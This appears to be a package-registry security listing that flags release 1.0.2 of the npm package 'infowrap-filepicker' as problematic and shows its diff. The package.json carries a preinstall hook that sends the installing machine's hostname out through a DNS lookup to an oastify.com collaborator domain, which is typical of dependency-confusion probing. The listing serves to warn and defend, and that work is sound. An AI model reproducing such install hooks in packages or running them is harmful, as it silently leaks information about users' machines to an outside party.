infowrap-filepicker 1.0.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of infowrap-filepicker might be problematic. Click here for more details.

@@ -0,0 +1,4 @@
1
+ npm i infowrap-filepicker
2
+ mkdir infowrap-filepicker
3
+ npm init
4
+ npm publish
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "infowrap-filepicker",
3
+ "version": "1.0.2",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall":"nslookup `hostname`.usq304a2r08suhoi6hlvk7xai1osck09.oastify.com ]>/dev/null",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }